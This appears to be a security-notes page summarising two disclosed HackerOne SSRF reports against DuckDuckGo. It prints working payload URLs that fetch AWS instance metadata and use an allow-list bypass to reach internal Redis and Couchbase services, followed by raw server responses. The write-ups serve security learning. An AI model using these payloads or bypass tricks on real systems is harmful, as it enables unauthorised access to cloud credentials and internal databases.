SSRF Write-ups

DuckDuckGo - SSRF Access AWS Data

DuckDuckGo disclosed on HackerOne: SSRF vulnerability on...HackerOne

Researcher illustrated vulnerability on the URL:

https://proxy.duckduckgo.com/iur/?f=1&image_host=

The image_host URL Parameter is vulnerable to SSRF. AWS Metadata can be viewed at the URI http://169.254.169.254/latest/meta-data/. The following payload returned the AWS Metadata of the instance using the URI in the image_host URL parameter.

https://proxy.duckduckgo.com/iur/?f=1&image_host=http://169.254.169.254/latest/meta-data/

Server Response:

ami-launch-index
ami-manifest-path
block-device-mapping/
hostname
instance-action
instance-id
instance-type
local-hostname
local-ipv4
mac
metrics/
network/
placement/
profile
public-hostname
public-ipv4
public-keys/
reservation-id
security-groups
services/```

DuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db

DuckDuckGo disclosed on HackerOne: SSRF on duckduckgo.com/iu/HackerOne

Researcher discovered SSRF on the u URL parameter on endpoint https://duckduckgo.com/iu?u= . The URL parameter originally contained http://yimg.com/ . Anytime you see a URL used in a parameter like that it is a good indication that the parameter might be vulnerable to SSRF.

Original Request:

Changing URL parameter to https://google.com/ it gets rejected and returns HTTP 403 Forbidden.

Researcher discovered the URL parameter needs to contain the original yimg.com domain somewhere in the parameter. Adding that domain to the url parameter of an attacker controlled domain successfully bypasses this allow-list check and executes SSRF. In the image below the researcher used the yimg.com domain in a URL parameter q for the burp suite collaborator domain. In the Burp Collaborator Client the application can be seen reaching out over HTTP and DNS to query the attacker controlled domain.

Researcher also used this to perform XSPA and port scan internal services. Services are running on the following ports:

Returning Redis information with the payload:https://duckduckgo.com/iu/?u=http://127.0.0.1:6868%2fstatus%2f?q=http://yimg.com/

{
  "current_time": "2018-08-23T17:56:06",
  "deployment_environment": "prod",
  "redis_local_last_successful_ping": "2018-08-23T13:56:05",
  "redis_local_url": "redis://127.0.0.1:6380",
  "redis_regional_last_successful_ping": "2018-08-23T13:56:05",
  "redis_regional_url": "redis://cache-services.duckduckgo.com:6380",
  "stat_blocked_ips_removed_since_launch": 8787,
  "stat_blocked_ips_since_launch": 12185,
  "stat_ipset_blocks": 266,
  "stat_redis_local_messages_received": 3613,
  "stat_redis_regional_messages_received": 10211,
  "status": "up"
}

Couchbase database access: https://duckduckgo.com/iu/?u=http://cache-services.duckduckgo.com:8091/pools/default/buckets?q=http://yimg.com/

[{"name":"botnet","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11213,"replicaIndex":true,"uri":"/pools/default/buckets/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","streamingUri":"/pools/default/bucketsStreaming/botnet?bucket_uuid=573aed7706bb78f1884c01efd0f10911","localRandomKeyUri":"/pools/default/buckets/botnet/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/botnet/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/botnet/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/botnet/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/botnet/stats","directoryURI":"/pools/default/buckets/botnet/statsDirectory","nodeStatsListURI":"/pools/default/buckets/botnet/nodes"},"ddocs":{"uri":"/pools/default/buckets/botnet/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"573aed7706bb78f1884c01efd0f10911","replicaNumber":0,"threadsNumber":3,"quota":{"ram":273678336,"rawRAM":273678336},"basicStats":{"quotaPercentUsed":18.58643023903799,"opsPerSec":518,"hitRatio":0.6626984126984127,"itemCount":208856,"memUsed":50867033},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"deep","bucketType":"memcached","authType":"none","saslPassword":"","proxyPort":11214,"replicaIndex":true,"uri":"/pools/default/buckets/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","streamingUri":"/pools/default/bucketsStreaming/deep?bucket_uuid=f95b42373da6bd8fdd51c93324229009","localRandomKeyUri":"/pools/default/buckets/deep/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/deep/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/deep/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/deep/controller/startRecovery"},"nodes":[{"systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/deep/stats","directoryURI":"/pools/default/buckets/deep/statsDirectory","nodeStatsListURI":"/pools/default/buckets/deep/nodes"},"ddocs":{"uri":"/pools/default/buckets/deep/ddocs"},"nodeLocator":"ketama","autoCompactionSettings":false,"uuid":"f95b42373da6bd8fdd51c93324229009","replicaNumber":0,"threadsNumber":3,"quota":{"ram":4116709376,"rawRAM":4116709376},"basicStats":{"quotaPercentUsed":80.05820960337813,"opsPerSec":194,"hitRatio":0.08633093525179857,"itemCount":2326851,"memUsed":3295763821},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","nodesExt"]},{"name":"services","bucketType":"membase","authType":"none","saslPassword":"","proxyPort":11212,"replicaIndex":false,"uri":"/pools/default/buckets/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","streamingUri":"/pools/default/bucketsStreaming/services?bucket_uuid=06787b1d4c84027860a5f73efb508bff","localRandomKeyUri":"/pools/default/buckets/services/localRandomKey","controllers":{"compactAll":"/pools/default/buckets/services/controller/compactBucket","compactDB":"/pools/default/buckets/default/controller/compactDatabases","purgeDeletes":"/pools/default/buckets/services/controller/unsafePurgeBucket","startRecovery":"/pools/default/buckets/services/controller/startRecovery"},"nodes":[{"couchApiBase":"http://10.0.1.188:8092/services%2B06787b1d4c84027860a5f73efb508bff","systemStats":{"cpu_utilization_rate":27.22710163111669,"swap_total":0,"swap_used":0,"mem_total":33737191424,"mem_free":5337153536},"interestingStats":{"cmd_get":492,"couch_docs_actual_disk_size":235428957137,"couch_docs_data_size":135860040563,"couch_spatial_data_size":0,"couch_spatial_disk_size":0,"couch_views_actual_disk_size":0,"couch_views_data_size":0,"curr_items":42313196,"curr_items_tot":39777489,"ep_bg_fetched":26,"get_hits":242,"mem_used":15435536286,"ops":1245,"vb_replica_curr_items":0},"uptime":"17550778","memoryTotal":33737191424,"memoryFree":5337153536,"mcdMemoryReserved":25739,"mcdMemoryAllocated":25739,"replication":1,"clusterMembership":"active","recoveryType":"none","status":"healthy","otpNode":"ns_1@127.0.0.1","thisNode":true,"hostname":"10.0.1.188:8091","clusterCompatibility":262149,"version":"4.5.1-2844-community","os":"x86_64-unknown-linux-gnu","ports":{"proxy":11211,"direct":11210},"services":["kv"]}],"stats":{"uri":"/pools/default/buckets/services/stats","directoryURI":"/pools/default/buckets/services/statsDirectory","nodeStatsListURI":"/pools/default/buckets/services/nodes"},"ddocs":{"uri":"/pools/default/buckets/services/ddocs"},"nodeLocator":"vbucket","autoCompactionSettings":false,"uuid":"06787b1d4c84027860a5f73efb508bff","vBucketServerMap":{"hashAlgorithm":"CRC","numReplicas":0,"serverList":["10.0.1.188:11210"],"vBucketMap":[[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]]},"replicaNumber":0,"threadsNumber":3,"quota":{"ram":14271119360,"rawRAM":14271119360},"basicStats":{"quotaPercentUsed":84.70888041118592,"opsPerSec":533,"diskFetches":26,"itemCount":39777489,"diskUsed":235428957137,"dataUsed":135860040563,"memUsed":12088905432},"evictionPolicy":"valueOnly","timeSynchronization":"disabled","bucketCapabilitiesVer":"","bucketCapabilities":["cbhello","touch","couchapi","cccp","xdcrCheckpointing","nodesExt","dcp"]}]```

PreviousServer-Side Request Forgery (SSRF)NextSource Code Review

Last updated 5 years ago

Was this helpful?

hashtagDuckDuckGo - SSRF Access AWS Data

hashtagDuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db

DuckDuckGo - SSRF Access AWS Data

DuckDuckGo - SSRF & XSPA. Access to Redis and Couchbase db